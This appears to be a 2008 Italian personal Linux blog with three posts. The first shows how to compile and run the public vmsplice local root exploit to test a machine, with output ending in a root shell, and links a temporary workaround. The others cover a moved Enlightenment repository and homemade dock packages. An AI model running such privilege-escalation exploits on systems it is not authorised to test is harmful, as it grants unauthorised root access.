Gozzilla's hideout

Local root exploit linux

gozzilla — Tue, 12 Feb 2008 21:34:04 +0000

E’ stato recentemente (8 febbraio) scoperto un bug serio nel kernel di linux, capace di far ottenere un accesso di amministratore ad un utente normale.
Al sito http://www.milw0rm.com/exploits/5092 si puo’ trovare un exploit per provare se nel vostro sistema e’ presente il bug. Scaricate, compilate ed eseguite:

Codice:

gozzilla@debian:~/working_area/exploit$ gcc -o exploit exploit.c -static -Wno-format
gozzilla@debian:~/working_area/exploit$ ./exploit
———————————–
Linux vmsplice Local Root Exploit
By qaaz
———————————–
[+] mmap: 0×0 .. 0×1000
[+] page: 0×0
[+] page: 0×20
[+] mmap: 0×4000 .. 0×5000
[+] page: 0×4000
[+] page: 0×4020
[+] mmap: 0×1000 .. 0×2000
[+] page: 0×1000
[+] mmap: 0xb7fb3000 .. 0xb7fe5000
[+] root
root@debian:~/working_area/exploit#

come si puo’ notare, il prompt finale e’ di amministratore
[nota] per compilare l’ exploit bisogna avere installati i sorgenti o almeno gli headers del kernel in esecuzione [/nota]

molte distribuzioni hanno gia’ tappato la falla in qualche modo e pertanto potrebbe bastare un aggiornamento del kernel

in caso contrario esiste una soluzione temporanea che va pero’ eseguita ad ogni riavvio della macchina. La si puo’ trovare qui:
http://www.ping.uio.no/~mortehu/disable-vmsplice-if-exploitable.c
anche in questo caso, scaricate, compilate ed eseguite

Codice:

gozzilla@debian:~/working_area/exploit$ gcc -o workaround disable-vmsplice-if-exploitable.c
gozzilla@debian:~/working_area/exploit$ ./workaround
———————————–
Linux vmsplice Local Root Exploit
By qaaz
———————————–
[+] mmap: 0×0 .. 0×1000
[+] page: 0×0
[+] page: 0×20
[+] mmap: 0×4000 .. 0×5000
[+] page: 0×4000
[+] page: 0×4020
[+] mmap: 0×1000 .. 0×2000
[+] page: 0×1000
[+] mmap: 0xb7d85000 .. 0xb7db7000
[+] root
Exploit gone!
gozzilla@debian:~/working_area/exploit$

e passa la paura

Che fine ha fatto edevelop.org?

gozzilla — Sat, 09 Feb 2008 11:09:56 +0000

Da qualche giorno edevelop.org non risponde, pertanto non e’ disponibile il repository ufficiale di Enlightenment e17.

Tuttavia il repository non e’ stato chiuso, ma soltanto spostato al vecchio mirror, e cioe’ qui:

deb http://debian.alphagemini.org/ unstable main

si consiglia di aggiornare il proprio sources.list

Avant-window-navigator: pacchetti deb

gozzilla — Sun, 03 Feb 2008 22:48:08 +0000

Per chi non lo sapesse avant-window-navigator e’ una dock stile quella di OS X. I repository debian che conosco sono piuttosto obsoleti (mi pare che da ottobre non vengono aggiornati), quindi ho creato alcuni pacchetti deb dalla versione di sviluppo (awn 166 + extras 296). Se vi servono stanno qui

I file .deb vanno installati a manina con dpkg -i

WARNING: sono stati compilati su Debian/sid, li ho installati e almeno sui miei pc posso dire che funzionano (anche se qualche applet non va ancora a dovere). Non ho idea se possano funzionare anche su ubuntu senza far esplodere tutto, in ogni caso per ubuntu mi pare che ci siano gia’ dei repository esterni per awn.